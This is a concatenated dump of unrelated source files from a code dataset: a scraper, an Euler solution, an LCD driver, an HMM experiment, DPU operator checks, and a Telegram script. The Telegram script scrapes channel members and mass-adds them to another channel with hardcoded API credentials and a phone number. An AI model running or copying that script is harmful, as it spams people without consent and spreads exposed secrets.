self.name\n\n def load_data(self):\n gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\n results = json.load(\n urllib.urlopen(\"https://api.import.io/store/connector/\"+self.api_id+\"/_query?input=webpage/url:\"+self.site+\"_apikey=\"+IMPORT_API_KEY, context=gcontext)\n )\n \n return results\n\n def run(self):\n results = self.load_data()\n count = 0\n length = len(results['results'])\n while count < length:\n piece = results[\"results\"][count]\n source = piece[\"title\"]\n title = piece[\"title/_text\"].encode(\"utf-8\")\n if self.db_collection.find({\"source\": source}).count() != 0:\n return\n else:\n self.db_collection.insert({\n \"title\": piece[\"title/_text\"].encode(\"utf-8\"),\n \"source\": source,\n \"coverPic\": piece[\"coverpic\"],\n \"region\": self.region,\n \"section\": self.category,\n \"logo\": self.logo,\n \"popularity\": 0,\n 
\"mixIndex\": self.mix_index,\n \"dateAdded\": datetime.datetime.now()\n })\n self.mix_index = count % length\n count += 1\n","repo_name":"delkopiso/vendor-jobs","sub_path":"ioScraper.py","file_name":"ioScraper.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7944629220","text":"# Find unit digit of a number\r\ndef unit_digit(n):\r\n digits = 1\r\n temp_n = n\r\n while n >= 10:\r\n n /= 10\r\n digits += 1\r\n n = temp_n\r\n while digits > 1:\r\n n -= n % (10 ** digits)\r\n digits -= 1\r\n return n\r\n\r\n\r\n# Check whether a number is prime\r\ndef check_if_prime(n):\r\n try:\r\n n = int(n)\r\n # n equals 2 or 3\r\n if n == 2 or n == 3:\r\n return True\r\n # n is divisible by two or three\r\n if n % 2 == 0 or n % 3 == 0:\r\n return False\r\n # n is odd\r\n else:\r\n i = 5\r\n while i ** 2 <= n:\r\n if n % i == 0 or n % (i + 2) == 0:\r\n return False\r\n i += 6\r\n return True\r\n except ValueError:\r\n return False\r\n\r\n\r\n# Check whether a number is prime generating\r\ndef check_if_prime_gen(n):\r\n count = 1\r\n while count <= int(n ** 0.5) + 1:\r\n if n % count == 0:\r\n if not check_if_prime(count + n // count):\r\n return False\r\n count += 1\r\n return True\r\n\r\n\r\ndef main():\r\n all_int = 2\r\n total_sum = 1\r\n while all_int <= 100000000:\r\n if check_if_prime_gen(all_int):\r\n total_sum += all_int\r\n all_int += 4\r\n print(total_sum)\r\n return\r\n\r\n\r\nmain()\r\n","repo_name":"eric-ycw/project-euler","sub_path":"euler357.py","file_name":"euler357.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7098556905","text":"from machine import I2C\nimport time\n\nclass Screen(object):\n LCD_CLEAR = 0x01\n LCD_CURSOR_MOVE = 0x14\n LCD_CURSOR_BLINKING = 0x0F\n LCD_CURSOR_OFF = 0x0C\n LCD_CURSOR_ON = 0x0E\n LCD_CURSOR_HOME = 0x02\n LCD_INIT_4BITS = 0x28\n LCD_ENTRY_MODE = 0x06\n LCD_CLEARDISPLAY = 0x01\n\n def __init__(self, i2c, address):\n self.i2c = i2c\n self.address = address\n buf = bytearray([0x00])\n self.i2c.writeto(self.address, buf) \n time.sleep_ms(50)\n\n self.lcd_write_raw(0x2, False, False, False)\n self.cmd(self.LCD_INIT_4BITS)\n self.cmd(self.LCD_INIT_4BITS)\n time.sleep_ms(10)\n self.cmd(self.LCD_CURSOR_BLINKING)\n time.sleep_ms(10)\n self.cmd(self.LCD_ENTRY_MODE)\n time.sleep_ms(10)\n self.cmd(self.LCD_CURSOR_HOME)\n time.sleep_ms(50)\n self.cmd(self.LCD_CURSOR_OFF)\n time.sleep_ms(50)\n self.cmd(self.LCD_CLEARDISPLAY)\n time.sleep_ms(50)\n \n \n def lcd_write_raw(self, data, rs, rw, light):\n data = (data << 4) & 0xF0\n if rw:\n data |= 0x02\n else:\n data &= 0xFC\n \n if light:\n data |= 0x08\n else:\n data &= 0xF7\n\n if rs: \n data |= 0x01\n else:\n data &= 0xFE\n\n data1 = data & 0xFB\n data2 = data | 0x04\n data3 = data & 0xFB\n buf = bytearray([data1, data2, data3])\n self.i2c.writeto(self.address, buf) \n\n\n def lcd_write(self, data, rs, rw, light):\n self.lcd_write_raw((data >> 4) & 0x0F, rs, rw, light)\n self.lcd_write_raw(data & 0x0F, rs, rw, light)\n \n def cmd(self, command):\n self.lcd_write(command, False, False, True)\n \n def write(self, char):\n self.lcd_write(char, True, False, True)\n \n def position(self, line, position):\n if line == 1:\n position += 0x40\n if line == 2:\n position += 0x14\n if line == 3:\n position += 0x54\n self.cmd(position)\n \n def write_line(self, text):\n for char in text:\n self.write(ord(char))\n 
\n","repo_name":"marekpiotrowskimp/rpi_pico","sub_path":"screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15161850730","text":"import pyrogram\r\nfrom pyrogram import Client, idle, filters, types\r\nfrom pyrogram.handlers import MessageHandler\r\nfrom pyrogram.enums import ChatType\r\nfrom time import sleep\r\nfrom os import system\r\nimport sqlite3\r\nfrom tgbot.services.api_sqlite_advert import *\r\n\r\nids = []\r\nold_ids = []\r\nmy_apps = []\r\nusers = []\r\n#numbers = []\r\nsettings = {'tg_api_id':'26779608', 'tg_api_hash':'b6c80c800cab2010db3901820732e58f', 'channel_to_invite':'-1001683374540','parse_channel_ids': '@goodnewsrussia1', 'delay_msg': 60, 'count_users_send': 20,\"numbers\": \"+639674137467\", \"log\": 1}\r\n\r\ntry:\r\n with open('settings_inv.ini', 'rt', encoding='UTF8') as (f):\r\n file = f.readlines()\r\n for line in file:\r\n if '\\n' in line:\r\n line = line[:-1]\r\n line = line.split(' = ')\r\n settings[line[0]] = line[1]\r\n\r\nexcept:\r\n with open('settings.ini', 'wt', encoding='UTF8') as (f):\r\n for key in settings:\r\n f.write(f\"{key} = {settings[key]}\\n\")\r\n \r\n print(f'Fill in the settings.ini file!')\r\n system('pause')\r\n exit(-1)\r\n\r\n#vars\r\n#api_id = input(\">Enter api_id: \").split(', ')\r\n#api_hash = input(\">Enter api_hash: \").split(', ')\r\n#numbers = settings['phone']\r\napi_id = settings['tg_api_id']\r\napi_hash = settings['tg_api_hash']\r\n#numbers[0][0] = \"+63 967 413 7467\"\r\n#numbers[0][1] = \"26779608\"\r\n#numbers[0][2] = \"b6c80c800cab2010db3901820732e58f\"\r\nchannel_to_invite = settings['channel_to_invite']\r\nchannel_id = settings['parse_channel_ids'].split(', ')\r\ndelay_msg = float(settings['delay_msg'])\r\nnumbers = settings['numbers'].split(', ')\r\nlog = int(settings['log'])\r\ncount_users_send = int(settings['count_users_send'])\r\n#----TODO\r\nnumbers2 = get_all_tgaccounts_phones_to_invite()\r\nprint(numbers2)\r\n#groups_list = first_groupsavtoinvite()\r\n\r\nfor i in range(0, len(numbers2)):\r\n my_apps.append(Client(f\"pyr{i}\"))\r\n print(numbers2[i])\r\n \r\n with Client(f\"pyr{numbers2[i][0]}\", int(numbers2[i][1]), numbers2[i][2]) as my_apps[i]:\r\n #with Client(f\"app{numbers[i]}\", int(api_id[i]), api_hash[i]) as my_apps[i]:\r\n pass\r\n\r\ndef log_txt(m):\r\n if log == 1:\r\n print(m)\r\n\r\ndef get_online_members():\r\n with Client(f\"pyr{numbers[0]}\", api_id[0], api_hash[0]) as my_apps[0]:\r\n app1 = my_apps[0]\r\n for k in channel_id:\r\n log_txt('получаем участников...')\r\n members = app1.get_chat_members(k)\r\n for member in members:\r\n ids.append(member.user.id)\r\n print(member.user.id)\r\n #for i, my_app in enumerate(my_apps):\r\n # with Client(f\"app{numbers[i]}\", api_id[i], api_hash[i]) as my_apps[i]:\r\n # my_app[i].get_chat_members(k)\r\n\r\n\r\ndef get_offline_members(groupid):\r\n ids = first_idsgrouptoinvitebyid(groupid, start, count)\r\n\r\ndef inviter(app):\r\n old_s = ''\r\n s = ''\r\n count = 0\r\n for g in old_ids:\r\n try:\r\n ids.remove(g)\r\n except:\r\n pass\r\n while True:\r\n for dialog in app.get_dialogs():\r\n if dialog.chat.type == ChatType.GROUP or dialog.chat.type == ChatType.SUPERGROUP:\r\n for v in ids:\r\n s = v\r\n del ids[:1]\r\n \r\n if old_s != s:\r\n if count != count_users_send:\r\n try:\r\n app.add_chat_members(channel_to_invite, s)\r\n count += 1\r\n except pyrogram.errors.exceptions.forbidden_403.UserPrivacyRestricted:\r\n 
print(f'У пользователя: {s} ограничение! Продолжаем!')\r\n except pyrogram.errors.exceptions.bad_request_400.PeerFlood:\r\n print('У этого аккаунта лимит!')\r\n break\r\n else:\r\n print(f'Пользователи подошли к концу: {count_users_send}')\r\n count = 0\r\n break\r\n else:\r\n print('Все сделано!')\r\n break\r\n \r\n old_s = s\r\n\r\n log_txt(f\"left: {len(ids)}\")\r\n log_txt(f\"user_send: {s}\")\r\n sleep(delay_msg)\r\n else:\r\n continue\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n get_online_members()\r\n for i in range(0, len(my_apps)):\r\n print(f'Аккаунтов всего: {len(my_apps)}')\r\n with Client(f\"pyr{numbers[i]}\", int(api_id[i]), api_hash[i]) as my_apps[i]:\r\n inviter(my_apps[i])","repo_name":"rashidovich2/TelegramGoodsInbot","sub_path":"inviter.py","file_name":"inviter.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"78"} +{"seq_id":"33178034401","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom hmmlearn import hmm\r\n\r\n## load data\r\nprint('Loading data...')\r\nall_gt = np.load('all_gt.npy')\r\nall_pred = np.load('Acc_65/all_pred_0.npy')\r\n\r\nnum_sims = 5\r\nnum_states = 12\r\nsave_diagonals = np.zeros((num_sims,num_states))\r\n\r\nfor qqq in range(0,num_sims):\r\n print('DOING SIMULATION ' + str(qqq+1) + ' OF ' + str(num_sims) + '.')\r\n ## define how to split data\r\n print(' Defining data splits...')\r\n ignore = 70 # to test how little data we need\r\n est_trans = 80\r\n est_conf = 0\r\n fit_params = 10\r\n re_order = np.random.permutation(len(all_gt))\r\n\r\n ## split data\r\n print(' Splitting data...')\r\n gt_est_trans = all_gt[re_order[ignore:est_trans]]\r\n gt_est_conf = all_gt[re_order[est_trans:est_trans+est_conf]]\r\n gt_fit = all_gt[re_order[est_trans+est_conf:est_trans+est_conf+fit_params]]\r\n gt_test = all_gt[re_order[est_trans+est_conf+fit_params:]]\r\n\r\n pred_est_trans = all_pred[re_order[ignore:est_trans]]\r\n pred_est_conf = all_pred[re_order[est_trans:est_trans+est_conf]]\r\n pred_fit = all_pred[re_order[est_trans+est_conf:est_trans+est_conf+fit_params]]\r\n pred_test = all_pred[re_order[est_trans+est_conf+fit_params:]]\r\n\r\n ## estimate init prob\r\n print(' Estimating start probabilities...')\r\n init_prob = np.ones(num_states)\r\n for case in all_gt[re_order[ignore:est_trans+fit_params]]:\r\n first_state = case[0]\r\n init_prob[first_state] += 1\r\n init_prob = init_prob/np.sum(init_prob)\r\n\r\n ## estimate transition matrix\r\n print(' Estimating transition probabilities...')\r\n trans_mat = np.ones((num_states,num_states))\r\n for case in all_gt[re_order[ignore:est_trans+fit_params]]:\r\n for i in range(1,len(case)):\r\n prev_state = case[i-1]\r\n curr_state = case[i]\r\n trans_mat[prev_state,curr_state] += 1\r\n for i,row in enumerate(trans_mat):\r\n trans_mat[i,:] = row/np.sum(row)\r\n\r\n ## estimate emission matrix\r\n print(' Estimating emission probabilities...')\r\n emiss_mat = np.ones((num_states, num_states))\r\n for i in range(0,len(gt_fit)):\r\n case = gt_fit[i]\r\n preds = pred_fit[i]\r\n for gt,pred in zip(case,preds):\r\n emiss_mat[gt,pred] += 1\r\n for i,row in enumerate(emiss_mat):\r\n emiss_mat[i,:] = row/np.sum(row)\r\n acc_oa = np.nanmean(np.diagonal(emiss_mat))\r\n\r\n ## define hmm model\r\n print(' Defining HMM model...')\r\n model = hmm.MultinomialHMM(n_components=num_states, n_iter=10,\r\n params='ste', init_params='')\r\n model.startprob_=init_prob\r\n model.transmat_=trans_mat\r\n 
model.emissionprob_=emiss_mat\r\n\r\n ## organize examples to fit model on\r\n print(' Organizing data to refine HMM parameters...')\r\n lengths = np.zeros((len(pred_fit),), dtype=int)\r\n all_x = np.array([pred_fit[0]]).T\r\n lengths[0] = len(pred_fit[0])\r\n for i in range(1,len(pred_fit)):\r\n this_x = np.array([pred_fit[i]]).T\r\n all_x = np.concatenate([all_x, this_x])\r\n lengths[i] = len(pred_fit[i])\r\n\r\n # fit model\r\n print(' Fitting HMM model...')\r\n model = model.fit(all_x, lengths)\r\n\r\n # decode test runs\r\n print(' Decoding test runs...')\r\n decode_test = []\r\n for case in pred_test:\r\n decode_state = model.decode(np.array([case]).T)\r\n decode_test.append(decode_state[1])\r\n\r\n # get confusion mat of decoded vals\r\n decoded_conf_mat = np.zeros((num_states,num_states))\r\n for case_gt,case_decode in zip(gt_test,decode_test):\r\n for gt,decode in zip(case_gt,case_decode):\r\n decoded_conf_mat[gt,decode] +=1\r\n for i,row in enumerate(decoded_conf_mat):\r\n decoded_conf_mat[i,:] = row/np.sum(row)\r\n\r\n save_diagonals[qqq,:] = np.diagonal(decoded_conf_mat)\r\n","repo_name":"MiningMyBusiness/HMMExperiments","sub_path":"LearnHMM.py","file_name":"LearnHMM.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11455851182","text":"import math\nimport numpy as np\nfrom nndct_shared.base import NNDCT_OP\nfrom nndct_shared.utils import PatternType\nfrom nndct_shared.nndct_graph import GraphSearcher, Tensor\nfrom pytorch_nndct.parse.torch_op_def import TorchConvTranspose2d, TorchConv2d\nfrom .device import DeviceInfo, DeviceType\nfrom .target_helper import DPUTargetHelper\n\n# refer to xcomplier src/pass/passes/PartitionPass.cpp\ndef check_bilinear_upsample_fake_weight(node, scale_h, scale_w):\n msg = \"\"\n ic = node.in_tensors[0].shape[3]\n wsize = (2 * scale_h) * (2 * scale_w) * ic\n weights = [0.0] * wsize\n kernel_h = 2 * scale_h\n kernel_w = 2 * scale_w\n half_pixel_centers = node.node_attr(node.op.AttrName.HALF_PIXEL_CENTERS)\n if half_pixel_centers:\n h_s = math.ceil(scale_h * 0.5 - 0.5)\n w_s = math.ceil(scale_w * 0.5 - 0.5)\n delta = 0.5\n scale2pos = {2: 4, 4: 6}\n else:\n h_s = 0\n w_s = 0\n delta = 0.5\n scale2pos = {2: 2, 4: 4, 8: 6}\n \n for j in range(h_s, scale_h + h_s):\n for i in range(w_s, scale_w + w_s):\n lerp_x = (i + delta) / scale_w - delta\n lerp_x_f = lerp_x - math.floor(lerp_x)\n lerp_y = (j + delta) / scale_h - delta\n lerp_y_f = lerp_y - math.floor(lerp_y)\n right_idx = kernel_w - 1 - i + w_s\n left_idx = kernel_w - 1 - scale_w - i + w_s\n bottom_idx = kernel_h - 1 - j + h_s\n top_idx = kernel_h - 1 - scale_h - j + h_s\n for c in range(ic):\n weights[top_idx * kernel_w * ic + left_idx * ic + c] = (1 - lerp_x_f) * (1 - lerp_y_f)\n weights[top_idx * kernel_w * ic + right_idx * ic + c] = lerp_x_f * (1 - lerp_y_f)\n weights[bottom_idx * kernel_w * ic + left_idx * ic + c] = (1 - lerp_x_f) * lerp_y_f\n weights[bottom_idx * kernel_w * ic + right_idx * ic + c] = lerp_x_f * lerp_y_f\n \n bit_width = 8\n bound_low = 0\n bound_hight = 2 ** bit_width - 1 \n \n def is_within_bound(val):\n fix_val = val * (2 ** scale2pos[scale_h])\n return not(fix_val > bound_hight or fix_val < bound_low or (fix_val == 0 and val != 0))\n \n within_bound = all(map(is_within_bound, weights))\n if not within_bound:\n msg = \"weights fixed data out of range.\"\n return False, msg\n\n return True, msg\n\n \ndef check_bilinear_upsample_scale(node):\n msg = \"\"\n input_shape = 
node.in_tensors[0].shape\n output_shape = node.out_tensors[0].shape\n i_h = input_shape[1]\n i_w = input_shape[2]\n o_h = output_shape[1]\n o_w = output_shape[2]\n scale_f = [1.0, 1.0] # [scale_w, scale_h]\n scale = []\n scale_f[0] = float(o_w) / float(i_w)\n scale_f[1] = float(o_h) / float(i_h)\n half_pixel_centers = node.node_attr(node.op.AttrName.HALF_PIXEL_CENTERS)\n if half_pixel_centers:\n allowed_scale = [2, 4]\n else:\n allowed_scale = [2, 4, 8]\n \n for s_f in scale_f:\n if not (math.ceil(s_f) == s_f and math.floor(s_f) == s_f and\n any([s== s_f for s in allowed_scale])):\n msg = f\"{node.op.type} output / input scale is {scale_f}\"\n return False, msg\n \n scale.append(int(s_f))\n \n if not all([scale[0] == s for s in scale]):\n msg = \"scale_w is not equal with scale_h\" \n return False, msg\n \n ret, msg = check_bilinear_upsample_fake_weight(node, scale[1], scale[0])\n if not ret:\n return ret, msg\n \n node.set_node_attr(node.op.AttrName.SCALE, [float(scale[0]), float(scale[1])])\n return True, msg\n \ndef create_transpose_dwconv2d_from_bilinear_upsample(node):\n transpose_dwconv2d = TorchConvTranspose2d(NNDCT_OP.DEPTHWISE_CONVTRANSPOSE2D)\n scale_w, scale_h = node.node_attr(node.op.AttrName.SCALE)\n scale_w = int(scale_w)\n scale_h = int(scale_h)\n half_pixel_centers = node.node_attr(node.op.AttrName.HALF_PIXEL_CENTERS)\n input_shape = node.in_tensors[0].shape\n output_shape = node.out_tensors[0].shape\n kernel_h = 2 * scale_h\n kernel_w = 2 * scale_w\n transpose_dwconv2d.set_config('output_padding', [0, 0])\n transpose_dwconv2d.set_config('kernel_size', [kernel_h, kernel_w])\n transpose_dwconv2d.set_config('stride', [scale_h, scale_w])\n input_w = input_shape[2] + 2\n input_h = input_shape[1] + 2\n if half_pixel_centers:\n pad_l = int(math.floor(float(scale_w) / 2.0 - 0.5))\n pad_r = output_shape[2] + int(kernel_w) - 2 - (input_w - 1) * scale_w - pad_l\n pad_t = int(math.floor(float(scale_h) / 2.0 - 0.5))\n pad_b = output_shape[1] + int(kernel_h) - 2 - (input_h - 1) * scale_h - pad_t\n else:\n pad_l = scale_w - 1\n pad_r = scale_w - 1\n pad_t = scale_h - 1\n pad_b = scale_h - 1\n\n padding = [int(kernel_w) - 1 - pad_l, \n int(kernel_w) - 1 - pad_r,\n int(kernel_h) - 1 - pad_t, \n int(kernel_h) - 1 - pad_b]\n\n transpose_dwconv2d.set_attr(transpose_dwconv2d.AttrName.PAD_MODE, 0)\n transpose_dwconv2d.set_attr(transpose_dwconv2d.AttrName.PAD, padding)\n return transpose_dwconv2d\n\ndef check_nonlinear(engine, node):\n op_nonlinear_map = {\n NNDCT_OP.CONV2D: [NNDCT_OP.RELU, NNDCT_OP.RELU6, NNDCT_OP.PRELU, NNDCT_OP.LEAKY_RELU, NNDCT_OP.HSWISH, NNDCT_OP.HSIGMOID],\n NNDCT_OP.CONVTRANSPOSE2D: [NNDCT_OP.RELU, NNDCT_OP.RELU6, NNDCT_OP.PRELU, NNDCT_OP.LEAKY_RELU],\n NNDCT_OP.DEPTHWISE_CONV2D: [NNDCT_OP.RELU, NNDCT_OP.RELU6, NNDCT_OP.PRELU, NNDCT_OP.LEAKY_RELU],\n NNDCT_OP.DEPTHWISE_CONVTRANSPOSE2D: [],\n \n }\n msg = \"\"\n nonlinear_types = op_nonlinear_map.get(node.op.type)\n if nonlinear_types is None:\n nonlinear_types = []\n children_nodes = node.owning_graph.children(node)\n if len(children_nodes) == 1 and children_nodes[0].op.type in nonlinear_types:\n if children_nodes[0].op.type == NNDCT_OP.LEAKY_RELU:\n alpha = children_nodes[0].node_attr(children_nodes[0].op.AttrName.ALPHA)\n dpu_alpha = 26.0 / 256\n if alpha != dpu_alpha:\n msg = f\"Its alpa is {alpha}, but DPU only support {dpu_alpha}.\"\n return False, msg\n \n children_nodes[0].target_device = DeviceInfo(DeviceType.DPU)\n\n return True, msg\n\ndef check_kernel(kernels, kernel_limit):\n msg = \"\"\n if any([k not in 
kernel_limit for k in kernels]):\n msg = f\"'kernel'({kernels[0]} x {kernels[1]}) is not in DPU supported range({kernel_limit}).\"\n return False, msg\n return True, msg\n\n\ndef check_stride(strides, stride_limit):\n msg = \"\"\n if any([s not in stride_limit for s in stride_limit]):\n msg = f\"'stride'({strides}) is not in DPU supported range({stride_limit}).\"\n return False, msg\n return True, msg\n\ndef check_load_jump_write(ic, channel_parallel, dilation=None):\n msg = \"\"\n dilation = dilation if dilation is not None else [1, 1]\n cp_limit = 256 * channel_parallel\n if ic > cp_limit:\n msg = f\"DPU only supports 'input_channel'({ic}) less than ({cp_limit})\"\n return False, msg\n return True, msg\n\ndef check_save_jump_read(oc, channel_parallel):\n msg = \"\"\n cp_limit = 256 * channel_parallel\n if oc > cp_limit:\n msg = f\"DPU only support 'output_channel'({oc}) less than {cp_limit}\"\n return False, msg\n return True, msg\n\ndef check_pad(pad, kernel):\n msg = \"\"\n if any([p < 0 for p in pad]):\n msg = f\"DPU only support non-negative 'pad'({pad})\"\n return False, msg\n\n if pad[0] > kernel[0]:\n msg = f\"DPU only supports 'pad_left'({pad[0]}) less than 'kernel_width'({kernel[0]})\"\n return False, msg\n \n if pad[1] > kernel[0]:\n msg = f\"DPU only supports 'pad_right'({pad[1]}) less than 'kernel_width'({kernel[0]})\"\n return False, msg\n \n if pad[2] > kernel[1]:\n msg = f\"DPU only supports 'pad_top'({pad[2]}) less than 'kernel_width'({kernel[1]})\"\n return False, msg\n\n if pad[3] > kernel[1]:\n msg = f\"DPU only supports 'pad_bottom'({pad[3]}) less than 'kernel_width'({kernel[1]})\"\n return False, msg\n \n return True, msg\n\ndef check_pad_with_limit(pad, kernel, pad_limit):\n msg = \"\"\n if any([p < 0 for p in pad]):\n msg = f\"DPU only support non-negative 'pad'({pad})\"\n return False, msg\n\n pad_idx_kernel_map = {\n \"pad_left\": [0, 0], # [pad_idx, kernel_idx]\n \"pad_right\": [1, 0],\n \"pad_top\": [2, 1],\n \"pad_bottom\": [3, 1]\n }\n\n\n for key, pad_idx_kernel_idx in pad_idx_kernel_map.items():\n pad_idx, kernel_idx = pad_idx_kernel_idx\n if pad_limit[key]:\n if pad[pad_idx] not in pad_limit[key]:\n msg = f\"{key}({pad[pad_idx]}) is not in range.\"\n return False, msg\n else:\n if pad[pad_idx] > kernel[kernel_idx]:\n msg = f\"DPU only supports {key}({pad[pad_idx]}) less than 'kernel'({kernel[kernel_idx]}).\"\n return False, msg\n \n return True, msg\n\n \ndef check_conv_weights_bank_depth(target, engine, kernel_shape):\n msg = \"\"\n weight_bank_name = engine.weight_bank\n bank_groups = DPUTargetHelper.get_bank_group(target)\n weights_bank = None\n for bank_group in bank_groups:\n if bank_group.name == weight_bank_name:\n weights_bank = bank_group\n break\n\n if weights_bank is None:\n msg = f\"{target.get_name()}'s bank group configure is error, there's no weights bank for the engine.\"\n return False, msg\n\n output_channel_parallel = engine.output_channel_parallel\n k_oc, k_h, k_w, k_ic = kernel_shape\n weight_depth = k_w * k_h * math.ceil(k_ic * 1.0 / weights_bank.bank_width) * math.ceil(output_channel_parallel * 1.0 / weights_bank.bank_num)\n if weight_depth > weights_bank.bank_depth:\n msg = f\"Weights({kernel_shape}) is too large to be loaded into parameter buffer. 
'kernel_h * kernel_w * ⌈input_channel / weights_bank_width⌉ * ⌈output_channel_parallel / weights_bank_num⌉({weight_depth})' is supporsed to be less equal than {weights_bank.bank_depth}.\"\n return False, msg\n \n return True, msg\n \ndef check_dwconv_weights_bank_depth(target, engine, kernel_shape):\n msg = \"\"\n weight_bank_name = engine.weight_bank\n bank_groups = target.get_bank_group()\n weights_bank = None\n for bank_group in bank_groups:\n if bank_group.name == weight_bank_name:\n weights_bank = bank_group\n\n if weights_bank is None:\n msg = f\"{target.get_name()}'s bank group configure is error, there's no weights bank for the engine.\"\n return False, msg\n\n channel_parallel = engine.channel_parallel\n k_oc, k_h, k_w, k_ic = kernel_shape\n weight_depth = k_w * k_h * math.ceil(channel_parallel * 1.0 / weights_bank.bank_width)\n if weight_depth > weights_bank.bank_depth:\n msg = f\"Weights({kernel_shape}) is too large to be loaded into parameter buffer. 'kernel_h * kernel_w * input_channel' is supporsed to be less equal than {weights_bank.bank_depth * weights_bank.bank_width}.\"\n return False, msg\n\n return True, msg\n\ndef check_transposed_kernel(kernel, stride, limit):\n msg = \"\"\n if not (kernel // stride in limit and (kernel % stride == 0 or (kernel // stride + 1) in limit)):\n msg = f\"'kernel / stride'({kernel} / {stride}) is not in DPU supported range{limit}.\"\n return False, msg\n return True, msg\n\ndef check_pool_engine(target):\n msg = \"\"\n if not (DPUTargetHelper.has_pool_engine(target) or DPUTargetHelper.has_alu_engine(target)):\n msg = f\"{DPUTargetHelper.get_name(target)} does not have pool-engine.\"\n return False, msg\n return True, msg\n\ndef check_dwconv_engine(target):\n msg = \"\"\n if not (DPUTargetHelper.has_dwconv_engine(target) or DPUTargetHelper.has_alu_engine(target)):\n msg = f\"{DPUTargetHelper.get_name(target)} does not have depthwise-conv-engine.\"\n return False, msg\n return True, msg\n\ndef check_eltwise_engine(target):\n msg = \"\"\n if not DPUTargetHelper.has_eltwise_engine(target):\n msg = f\"{DPUTargetHelper.get_name(target)} does not have eltwise-engine\"\n return False, msg\n return True, msg\n\n\n\ndef filter_conv2d(node, target):\n msg = \"\"\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n dilation = node.node_attr(node.op.AttrName.DILATION)\n padding = node.node_attr(node.op.AttrName.PAD)\n\n conv_engine = DPUTargetHelper.get_conv_engine(target)\n channel_parallel = conv_engine.input_channel_parallel\n ic = node.in_tensors[0].shape[3]\n oc = node.out_tensors[0].shape[3]\n dilated_ksize = list(ksize)\n for i in range(len(dilated_ksize)):\n dilated_ksize[i] = (ksize[i] - 1) * dilation[i] + 1\n \n kernel_limit = DPUTargetHelper.parse_range(\"1-16\")\n\n if DPUTargetHelper.has_attr(conv_engine, \"conv_limit\") and conv_engine.conv_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(conv_engine.conv_limit.kernel_size)\n \n ret, msg = check_kernel(ksize, kernel_limit)\n\n if not ret:\n return ret, msg\n \n ret, msg = check_conv_weights_bank_depth(target, conv_engine, node.op.get_param(node.op.ParamName.WEIGHTS).shape)\n\n if not ret:\n return ret, msg\n \n stride_limit = DPUTargetHelper.parse_range(\"1-4\")\n if DPUTargetHelper.has_attr(conv_engine, \"conv_limit\") and conv_engine.conv_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(conv_engine.conv_limit.stride)\n\n iw = node.in_tensors[0].shape[2]\n ih = node.in_tensors[0].shape[1]\n\n if iw != ksize[0] or 
ih != ksize[1]:\n ret, msg = check_stride(strides, stride_limit)\n \n if not ret:\n return ret, msg\n\n ret, msg = check_load_jump_write(ic, channel_parallel, dilation)\n\n if not ret:\n return ret, msg\n \n ret, msg = check_pad(padding, dilated_ksize)\n\n if not ret:\n return ret, msg\n\n # ret, msg = check_nonlinear(conv_engine, node)\n\n # if not ret:\n # return ret, msg\n\n return True, msg\n\n\n\n\ndef filter_depthwise_conv2d(node, target):\n msg = \"\"\n ret, msg = check_dwconv_engine(target)\n if not ret:\n return ret, msg\n ksize = node.node_attr(node.op.AttrName.KERNEL)\n strides = node.node_attr(node.op.AttrName.STRIDE)\n dilation = node.node_attr(node.op.AttrName.DILATION)\n padding = node.node_attr(node.op.AttrName.PAD)\n ic = node.in_tensors[0].shape[3]\n oc = node.out_tensors[0].shape[3]\n dilated_ksize = list(ksize)\n for i in range(len(dilated_ksize)):\n dilated_ksize[i] = (ksize[i] - 1) * dilation[i] + 1\n \n kernel_limit = DPUTargetHelper.parse_range(\"1-16\")\n stride_limit = DPUTargetHelper.parse_range(\"1-4\")\n pad_limit = {}\n if DPUTargetHelper.has_alu_engine(target):\n alu_engine = DPUTargetHelper.get_alu_engine(target)\n channel_parallel = alu_engine.channel_parallel\n if DPUTargetHelper.has_attr(alu_engine, \"alu_limit\"):\n alu_limit = alu_engine.alu_limit\n if alu_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(alu_limit.kernel_size)\n if alu_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(alu_limit.stride)\n\n if DPUTargetHelper.has_attr(alu_engine, \"pad_limit\"):\n alu_pad_limit = alu_engine.pad_limit\n if alu_pad_limit.pad_left:\n pad_limit[\"pad_left\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_left)\n if alu_pad_limit.pad_right:\n pad_limit[\"pad_right\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_right)\n \n if alu_pad_limit.pad_top:\n pad_limit[\"pad_top\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_top)\n\n if alu_pad_limit.pad_bottom:\n pad_limit[\"pad_bottom\"] = DPUTargetHelper.parse_range(alu_pad_limit.pad_bottom)\n else:\n dwconv_engine = DPUTargetHelper.get_dwconv_engine(target)\n channel_parallel = dwconv_engine.channel_parallel\n if DPUTargetHelper.has_attr(dwconv_engine, \"dwconv_limit\"):\n dwconv_limit = dwconv_engine.dwconv_limit\n if dwconv_limit.kernel_size:\n kernel_limit = DPUTargetHelper.parse_range(dwconv_limit.kernel_size)\n if dwconv_limit.stride:\n stride_limit = DPUTargetHelper.parse_range(dwconv_limit.stride)\n \n if DPUTargetHelper.get_type(target) == \"DPUCAHX8H\":\n if strides[0] > ksize[0]:\n msg = f\"The stride_w({strides[0]}) > kernel_w({ksize[0]}), but {DPUTargetHelper.get_name(target)} only support stride_w <= kernel_w.\"\n return False, msg\n\n ret, msg = check_kernel(ksize, kernel_limit)\n if not ret:\n return ret, 